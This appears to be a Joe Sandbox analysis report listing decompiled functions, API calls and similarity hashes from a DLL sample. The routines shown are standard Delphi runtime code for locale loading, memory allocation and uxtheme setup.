lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00705698
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 007056A5
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 007056AB
lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 007056D6
lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 0070571D
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 0070572D
lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00705755
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00705765
lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 0070578B
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 0070579B

Strings

., xrefs: 007056E8
Software\Borland\Delphi\Locales, xrefs: 007055E8
Software\Borland\Locales, xrefs: 007055AC, 007055CA

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
String ID: .$Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1759228003-3917250287
Opcode ID: db367bd9d18067696511da8a162b37f281131e46ed4567ed6ae760596650a38b
Instruction ID: e064a6b381985c24d753151f465461eb95a8e0df4d6c16c25b9689752fbf2b6e
Opcode Fuzzy Hash: db367bd9d18067696511da8a162b37f281131e46ed4567ed6ae760596650a38b
Instruction Fuzzy Hash: 90513475A4065CFEEB21D6A4CC4AFEF77EC9B04744F8402A1B604E61C2E6B89E448F61

Uniqueness

Uniqueness Score: -1.00%

Function 00705688 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 98
stringlibrarythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 61%

			E00705688() {
				void* _t28;
				void* _t30;
				struct HINSTANCE__* _t36;
				struct HINSTANCE__* _t42;
				char* _t51;
				void* _t52;
				struct HINSTANCE__* _t59;
				void* _t61;

				_push(0x105);
				_push( *((intOrPtr*)(_t61 - 4)));
				_push(_t61 - 0x11d);
				L007012A4();
				GetLocaleInfoA(GetThreadLocale(), 3, _t61 - 0xd, 5); // executed
				_t59 = 0;
				if( *(_t61 - 0x11d) == 0 ||  *(_t61 - 0xd) == 0 &&  *((char*)(_t61 - 0x12)) == 0) {
					L14:
					return _t59;
				} else {
					_t28 = _t61 - 0x11d;
					_push(_t28);
					L007012AC();
					_t51 = _t28 + _t61 - 0x11d;
					L5:
					if( *_t51 != 0x2e && _t51 != _t61 - 0x11d) {
						_t51 = _t51 - 1;
						goto L5;
					}
					_t30 = _t61 - 0x11d;
					if(_t51 != _t30) {
						_t52 = _t51 + 1;
						if( *((char*)(_t61 - 0x12)) != 0) {
							_push(0x105 - _t52 - _t30);
							_push(_t61 - 0x12);
							_push(_t52);
							L007012A4();
							_t59 = LoadLibraryExA(_t61 - 0x11d, 0, 2);
						}
						if(_t59 == 0 &&  *(_t61 - 0xd) != 0) {
							_push(0x105 - _t52 - _t61 - 0x11d);
							_push(_t61 - 0xd);
							_push(_t52);
							L007012A4();
							_t36 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
							_t59 = _t36;
							if(_t59 == 0) {
								 *((char*)(_t61 - 0xb)) = 0;
								_push(0x105 - _t52 - _t61 - 0x11d);
								_push(_t61 - 0xd);
								_push(_t52);
								L007012A4();
								_t42 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
								_t59 = _t42;
							}
						}
					}
					goto L14;
				}
			}

0x00705688
0x00705690
0x00705697
0x00705698
0x007056ab
0x007056b0
0x007056b9
0x007057a2
0x007057a9
0x007056cf
0x007056cf
0x007056d5
0x007056d6
0x007056e3
0x007056e8
0x007056eb
0x007056e7
0x00000000
0x007056e7
0x007056f7
0x007056ff
0x00705705
0x0070570a
0x00705717
0x0070571b
0x0070571c
0x0070571d
0x00705732
0x00705732
0x00705736
0x0070574f
0x00705753
0x00705754
0x00705755
0x00705765
0x0070576a
0x0070576e
0x00705770
0x00705785
0x00705789
0x0070578a
0x0070578b
0x0070579b
0x007057a0
0x007057a0
0x0070576e
0x00705736
0x00000000
0x007056ff

APIs

lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00705698
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 007056A5
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 007056AB
lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 007056D6
lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 0070571D
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 0070572D
lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00705755
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00705765
lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 0070578B
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 0070579B

Strings

., xrefs: 007056E8
Software\Borland\Delphi\Locales, xrefs: 007055E8
Software\Borland\Locales, xrefs: 007055AC, 007055CA

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
String ID: .$Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1599918012-3917250287
Opcode ID: c360a1373c19ce246717240d90a6a2305b5a62bcfa2bef53c1f06bb8dd55e30e
Instruction ID: d0342caaaca52011e97f38a28fd09e14696a939130ace6d0857fa6bd4b4c68d3
Opcode Fuzzy Hash: c360a1373c19ce246717240d90a6a2305b5a62bcfa2bef53c1f06bb8dd55e30e
Instruction Fuzzy Hash: 7131A471E0065CEAEF25D6B8CC4AFEF77EC9B44340F8402A1A604E61C2E678DE848F50

Uniqueness

Uniqueness Score: -1.00%

Function 00701524 Relevance: 2.5, APIs: 2, Instructions: 37
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00701524(void* __eax, void** __edx) {
				void* _t3;
				void** _t8;
				void* _t11;
				long _t14;

				_t8 = __edx;
				if(__eax >= 0x100000) {
					_t14 = __eax + 0x0000ffff & 0xffff0000;
				} else {
					_t14 = 0x100000;
				}
				_t8[1] = _t14;
				_t3 = VirtualAlloc(0, _t14, 0x2000, 1); // executed
				_t11 = _t3;
				 *_t8 = _t11;
				if(_t11 != 0) {
					_t3 = E007013D8(0x76f5ec, _t8);
					if(_t3 == 0) {
						VirtualFree( *_t8, 0, 0x8000);
						 *_t8 = 0;
						return 0;
					}
				}
				return _t3;
			}

0x00701527
0x00701531
0x00701540
0x00701533
0x00701533
0x00701533
0x00701546
0x00701553
0x00701558
0x0070155a
0x0070155e
0x00701567
0x0070156e
0x0070157a
0x00701581
0x00000000
0x00701581
0x0070156e
0x00701586

APIs

VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,0070182D), ref: 00701553
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,0070182D), ref: 0070157A

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 3060a551ded02c54f0854ef9aa44341ab61884efc351139bedcc8574e58216ba
Instruction ID: 9092272d3f871e3a26e295d7962e267335a30b5f12a446f16f52850968853610
Opcode Fuzzy Hash: 3060a551ded02c54f0854ef9aa44341ab61884efc351139bedcc8574e58216ba
Instruction Fuzzy Hash: 7EF02773B00320D7DB6059695C89B429AC49F85B90F980270F90DEF3C9C2A5CC0182A0

Uniqueness

Uniqueness Score: -1.00%

Function 00705340 Relevance: 1.5, APIs: 1, Instructions: 26
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00705340(void* __eax) {
				char _v272;
				intOrPtr _t14;
				void* _t16;
				intOrPtr _t18;
				intOrPtr _t19;

				_t16 = __eax;
				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
					_t3 = _t16 + 4; // 0x700000
					GetModuleFileNameA( *_t3,  &_v272, 0x105);
					_t14 = E0070557C(_t19); // executed
					_t18 = _t14;
					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
					if(_t18 == 0) {
						_t5 = _t16 + 4; // 0x700000
						 *((intOrPtr*)(_t16 + 0x10)) =  *_t5;
					}
				}
				return  *((intOrPtr*)(_t16 + 0x10));
			}

0x00705348
0x0070534e
0x0070535a
0x0070535e
0x00705367
0x0070536c
0x0070536e
0x00705373
0x00705375
0x00705378
0x00705378
0x00705373
0x00705386

APIs

GetModuleFileNameA.KERNEL32(00700000,?,00000105), ref: 0070535E

Part of subcall function 0070557C: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,0076C0A4), ref: 00705598
Part of subcall function 0070557C: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,?,0076C0A4), ref: 007055B6
Part of subcall function 0070557C: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,?,0076C0A4), ref: 007055D4
Part of subcall function 0070557C: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 007055F2
Part of subcall function 0070557C: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,00705681,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0070563B
Part of subcall function 0070557C: RegQueryValueExA.ADVAPI32(?,007057E8,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,00705681,?,80000001), ref: 00705659
Part of subcall function 0070557C: RegCloseKey.ADVAPI32(?,00705688,00000000,?,?,00000000,00705681,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 0070567B

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID: Open$FileModuleNameQueryValue$Close
String ID:
API String ID: 2796650324-0
Opcode ID: 1c333c546541f2b90816c7a902ffb1918a2617d41d5f359c28264f9ad83b6de8
Instruction ID: 58e048cd4fc4bf00445bfca4260f9d6fa1e296296e9dcfcdcbfde27c30ea7239
Opcode Fuzzy Hash: 1c333c546541f2b90816c7a902ffb1918a2617d41d5f359c28264f9ad83b6de8
Instruction Fuzzy Hash: AEE06D71A00614CBCB10DE6C88C5A4773E8AB08794F000A51EC54CF286E3B4DD208BD0

Uniqueness

Uniqueness Score: -1.00%

Function 007016B8 Relevance: 1.3, APIs: 1, Instructions: 54
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E007016B8(signed int __eax, void** __ecx, intOrPtr __edx) {
				signed int _v20;
				void** _v24;
				void* _t15;
				void** _t16;
				void* _t17;
				signed int _t27;
				intOrPtr* _t29;
				void* _t31;
				intOrPtr* _t32;

				_v24 = __ecx;
				 *_t32 = __edx;
				_t31 = __eax & 0xfffff000;
				_v20 = __eax +  *_t32 + 0x00000fff & 0xfffff000;
				 *_v24 = _t31;
				_t15 = _v20 - _t31;
				_v24[1] = _t15;
				_t29 =  *0x76f5ec; // 0xa74124
				while(_t29 != 0x76f5ec) {
					_t7 = _t29 + 8; // 0x23f0000
					_t17 =  *_t7;
					_t8 = _t29 + 0xc; // 0x100000
					_t27 =  *_t8 + _t17;
					if(_t31 > _t17) {
						_t17 = _t31;
					}
					if(_t27 > _v20) {
						_t27 = _v20;
					}
					if(_t27 > _t17) {
						_t15 = VirtualAlloc(_t17, _t27 - _t17, 0x1000, 4); // executed
						if(_t15 == 0) {
							_t16 = _v24;
							 *_t16 = 0;
							return _t16;
						}
					}
					_t29 =  *_t29;
				}
				return _t15;
			}

0x007016bf
0x007016c3
0x007016ca
0x007016df
0x007016e7
0x007016ed
0x007016f3
0x007016f6
0x0070173a
0x007016fe
0x007016fe
0x00701701
0x00701704
0x00701708
0x0070170a
0x0070170a
0x00701710
0x00701712
0x00701712
0x00701718
0x00701725
0x0070172c
0x0070172e
0x00701734
0x00000000
0x00701734
0x0070172c
0x00701738
0x00701738
0x00701749

APIs

VirtualAlloc.KERNEL32(023F0000,?,00001000,00000004), ref: 00701725

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: d01f9c4df4e897b44e15f78893118b8bd49ba451deabd4bbdab2a16f4fd6da6f
Instruction ID: 4c52486357115ab605b7c2e849b2f69f0a60a76eb15dfe2f9792ade8c4948330
Opcode Fuzzy Hash: d01f9c4df4e897b44e15f78893118b8bd49ba451deabd4bbdab2a16f4fd6da6f
Instruction Fuzzy Hash: 8311A976A04701DFC3108F28CC80A2ABBE5EBC4760F86C63CF58887395E735AC408A81

Uniqueness

Uniqueness Score: -1.00%

Function 0071DCE8 Relevance: 1.3, APIs: 1, Instructions: 52
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0071DCE8(intOrPtr _a4, intOrPtr _a8) {
				void* _t14;
				void _t15;
				intOrPtr _t25;
				char* _t26;
				void* _t35;

				if( *0x76f88c == 0) {
					_t14 = VirtualAlloc(0, 0x1000, 0x1000, 0x40); // executed
					_t35 = _t14;
					_t15 =  *0x76f888; // 0x860000
					 *_t35 = _t15;
					_t1 = _t35 + 4; // 0x4
					E007028C8(0x76c408, 2, _t1);
					_t2 = _t35 + 5; // 0x5
					 *((intOrPtr*)(_t35 + 6)) = L0071DCE0(_t2, 0x71dcc0);
					_t4 = _t35 + 0xa; // 0xa
					_t26 = _t4;
					do {
						 *_t26 = 0xe8;
						_t5 = _t35 + 4; // 0x4
						 *((intOrPtr*)(_t26 + 1)) = L0071DCE0(_t26, _t5);
						 *((intOrPtr*)(_t26 + 5)) =  *0x76f88c;
						 *0x76f88c = _t26;
						_t26 = _t26 + 0xd;
					} while (_t26 - _t35 < 0xffc);
					 *0x76f888 = _t35;
				}
				_t25 =  *0x76f88c;
				 *0x76f88c =  *((intOrPtr*)(_t25 + 5));
				 *((intOrPtr*)(_t25 + 5)) = _a4;
				 *((intOrPtr*)(_t25 + 9)) = _a8;
				return  *0x76f88c;
			}

0x0071dcf6
0x0071dd06
0x0071dd0b
0x0071dd0d
0x0071dd12
0x0071dd14
0x0071dd21
0x0071dd2b
0x0071dd33
0x0071dd36
0x0071dd36
0x0071dd39
0x0071dd39
0x0071dd3c
0x0071dd46
0x0071dd4b
0x0071dd4e
0x0071dd50
0x0071dd57
0x0071dd5e
0x0071dd5e
0x0071dd66
0x0071dd6b
0x0071dd70
0x0071dd76
0x0071dd7d

APIs

VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 0071DD06

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: e1430b7fb496a6f9b5fc9f77f99d640977f17c88008f9d9aaa25fb7f10649e74
Instruction ID: 76e92bcdffcf8cfd9070f408226ab6128baa1d2eb43a0d9ef4401212bdb64544
Opcode Fuzzy Hash: e1430b7fb496a6f9b5fc9f77f99d640977f17c88008f9d9aaa25fb7f10649e74
Instruction Fuzzy Hash: BE114874240316DFC720DF18D880B86BBE5EB49350B20C93AE9999B385D3B8E845CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00701380 Relevance: 1.3, APIs: 1, Instructions: 34
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00701380() {
				intOrPtr* _t4;
				void* _t5;
				void _t6;
				intOrPtr* _t9;
				void* _t12;
				void* _t14;

				if( *0x76f5e8 != 0) {
					L5:
					_t4 =  *0x76f5e8;
					 *0x76f5e8 =  *_t4;
					return _t4;
				} else {
					_t5 = LocalAlloc(0, 0x644); // executed
					_t12 = _t5;
					if(_t12 != 0) {
						_t6 =  *0x76f5e4; // 0xa73af0
						 *_t12 = _t6;
						 *0x76f5e4 = _t12;
						_t14 = 0;
						do {
							_t2 = (_t14 + _t14) * 8; // 0x4
							_t9 = _t12 + _t2 + 4;
							 *_t9 =  *0x76f5e8;
							 *0x76f5e8 = _t9;
							_t14 = _t14 + 1;
						} while (_t14 != 0x64);
						goto L5;
					} else {
						return 0;
					}
				}
			}

0x0070138a
0x007013c6
0x007013c6
0x007013ca
0x007013ce
0x0070138c
0x00701393
0x00701398
0x0070139c
0x007013a3
0x007013a8
0x007013aa
0x007013b0
0x007013b2
0x007013b6
0x007013b6
0x007013bc
0x007013be
0x007013c0
0x007013c1
0x00000000
0x0070139e
0x007013a2
0x007013a2
0x0070139c

APIs

LocalAlloc.KERNEL32(00000000,00000644,?,0076F5FC,007013E3,?,?,00701482,?,?,?,00000000,00004003,007019C3), ref: 00701393

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: c2719c175a0c9af433d1d3de227f5bfadc86fe7dbe88cd59617848a85a90fd8e
Instruction ID: 5bb3d2ad4a385ddcf675a41726058c9bf0f40af86b33d10da509f6b3afee036a
Opcode Fuzzy Hash: c2719c175a0c9af433d1d3de227f5bfadc86fe7dbe88cd59617848a85a90fd8e
Instruction Fuzzy Hash: C0F058B5701201CFD724CF28E8807A5B3E1FB99356F60827AE286C7791E2799C518B80

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0072921C Relevance: 166.5, APIs: 48, Strings: 47, Instructions: 266
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 90%

			E0072921C(void* __ebx, void* __ecx) {
				char _v5;
				intOrPtr _t2;
				intOrPtr _t6;
				intOrPtr _t108;
				intOrPtr _t111;

				_t2 =  *0x76fa48; // 0x23f0dc8
				E00729014(_t2);
				_push(_t111);
				_push(0x7295cf);
				_push( *[fs:eax]);
				 *[fs:eax] = _t111;
				 *0x76fa44 =  *0x76fa44 + 1;
				if( *0x76fa40 == 0) {
					 *0x76fa40 = LoadLibraryA("uxtheme.dll");
					if( *0x76fa40 > 0) {
						 *0x76f980 = GetProcAddress( *0x76fa40, "OpenThemeData");
						 *0x76f984 = GetProcAddress( *0x76fa40, "CloseThemeData");
						 *0x76f988 = GetProcAddress( *0x76fa40, "DrawThemeBackground");
						 *0x76f98c = GetProcAddress( *0x76fa40, "DrawThemeText");
						 *0x76f990 = GetProcAddress( *0x76fa40, "GetThemeBackgroundContentRect");
						 *0x76f994 = GetProcAddress( *0x76fa40, "GetThemeBackgroundContentRect");
						 *0x76f998 = GetProcAddress( *0x76fa40, "GetThemePartSize");
						 *0x76f99c = GetProcAddress( *0x76fa40, "GetThemeTextExtent");
						 *0x76f9a0 = GetProcAddress( *0x76fa40, "GetThemeTextMetrics");
						 *0x76f9a4 = GetProcAddress( *0x76fa40, "GetThemeBackgroundRegion");
						 *0x76f9a8 = GetProcAddress( *0x76fa40, "HitTestThemeBackground");
						 *0x76f9ac = GetProcAddress( *0x76fa40, "DrawThemeEdge");
						 *0x76f9b0 = GetProcAddress( *0x76fa40, "DrawThemeIcon");
						 *0x76f9b4 = GetProcAddress( *0x76fa40, "IsThemePartDefined");
						 *0x76f9b8 = GetProcAddress( *0x76fa40, "IsThemeBackgroundPartiallyTransparent");
						 *0x76f9bc = GetProcAddress( *0x76fa40, "GetThemeColor");
						 *0x76f9c0 = GetProcAddress( *0x76fa40, "GetThemeMetric");
						 *0x76f9c4 = GetProcAddress( *0x76fa40, "GetThemeString");
						 *0x76f9c8 = GetProcAddress( *0x76fa40, "GetThemeBool");
						 *0x76f9cc = GetProcAddress( *0x76fa40, "GetThemeInt");
						 *0x76f9d0 = GetProcAddress( *0x76fa40, "GetThemeEnumValue");
						 *0x76f9d4 = GetProcAddress( *0x76fa40, "GetThemePosition");
						 *0x76f9d8 = GetProcAddress( *0x76fa40, "GetThemeFont");
						 *0x76f9dc = GetProcAddress( *0x76fa40, "GetThemeRect");
						 *0x76f9e0 = GetProcAddress( *0x76fa40, "GetThemeMargins");
						 *0x76f9e4 = GetProcAddress( *0x76fa40, "GetThemeIntList");
						 *0x76f9e8 = GetProcAddress( *0x76fa40, "GetThemePropertyOrigin");
						 *0x76f9ec = GetProcAddress( *0x76fa40, "SetWindowTheme");
						 *0x76f9f0 = GetProcAddress( *0x76fa40, "GetThemeFilename");
						 *0x76f9f4 = GetProcAddress( *0x76fa40, "GetThemeSysColor");
						 *0x76f9f8 = GetProcAddress( *0x76fa40, "GetThemeSysColorBrush");
						 *0x76f9fc = GetProcAddress( *0x76fa40, "GetThemeSysBool");
						 *0x76fa00 = GetProcAddress( *0x76fa40, "GetThemeSysSize");
						 *0x76fa04 = GetProcAddress( *0x76fa40, "GetThemeSysFont");
						 *0x76fa08 = GetProcAddress( *0x76fa40, "GetThemeSysString");
						 *0x76fa0c = GetProcAddress( *0x76fa40, "GetThemeSysInt");
						 *0x76fa10 = GetProcAddress( *0x76fa40, "IsThemeActive");
						 *0x76fa14 = GetProcAddress( *0x76fa40, "IsAppThemed");
						 *0x76fa18 = GetProcAddress( *0x76fa40, "GetWindowTheme");
						 *0x76fa1c = GetProcAddress( *0x76fa40, "EnableThemeDialogTexture");
						 *0x76fa20 = GetProcAddress( *0x76fa40, "IsThemeDialogTextureEnabled");
						 *0x76fa24 = GetProcAddress( *0x76fa40, "GetThemeAppProperties");
						 *0x76fa28 = GetProcAddress( *0x76fa40, "SetThemeAppProperties");
						 *0x76fa2c = GetProcAddress( *0x76fa40, "GetCurrentThemeName");
						 *0x76fa30 = GetProcAddress( *0x76fa40, "GetThemeDocumentationProperty");
						 *0x76fa34 = GetProcAddress( *0x76fa40, "DrawThemeParentBackground");
						 *0x76fa38 = GetProcAddress( *0x76fa40, "EnableTheming");
					}
				}
				_v5 =  *0x76fa40 > 0;
				_pop(_t108);
				 *[fs:eax] = _t108;
				_push(0x7295d6);
				_t6 =  *0x76fa48; // 0x23f0dc8
				return E0072901C(_t6);
			}

0x00729226
0x0072922b
0x00729232
0x00729233
0x00729238
0x0072923b
0x0072923e
0x00729247
0x00729257
0x0072925c
0x0072926f
0x00729281
0x00729293
0x007292a5
0x007292b7
0x007292c9
0x007292db
0x007292ed
0x007292ff
0x00729311
0x00729323
0x00729335
0x00729347
0x00729359
0x0072936b
0x0072937d
0x0072938f
0x007293a1
0x007293b3
0x007293c5
0x007293d7
0x007293e9
0x007293fb
0x0072940d
0x0072941f
0x00729431
0x00729443
0x00729455
0x00729467
0x00729479
0x0072948b
0x0072949d
0x007294af
0x007294c1
0x007294d3
0x007294e5
0x007294f7
0x00729509
0x0072951b
0x0072952d
0x0072953f
0x00729551
0x00729563
0x00729575
0x00729587
0x00729599
0x007295ab
0x007295ab
0x0072925c
0x007295b3
0x007295b9
0x007295bc
0x007295bf
0x007295c4
0x007295ce

APIs

LoadLibraryA.KERNEL32(uxtheme.dll,00000000,007295CF), ref: 00729252
GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0072926A
GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0072927C
GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0072928E
GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 007292A0
GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 007292B2
GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 007292C4
GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 007292D6
GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 007292E8
GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 007292FA
GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0072930C
GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0072931E
GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 00729330
GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 00729342
GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 00729354
GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 00729366
GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 00729378
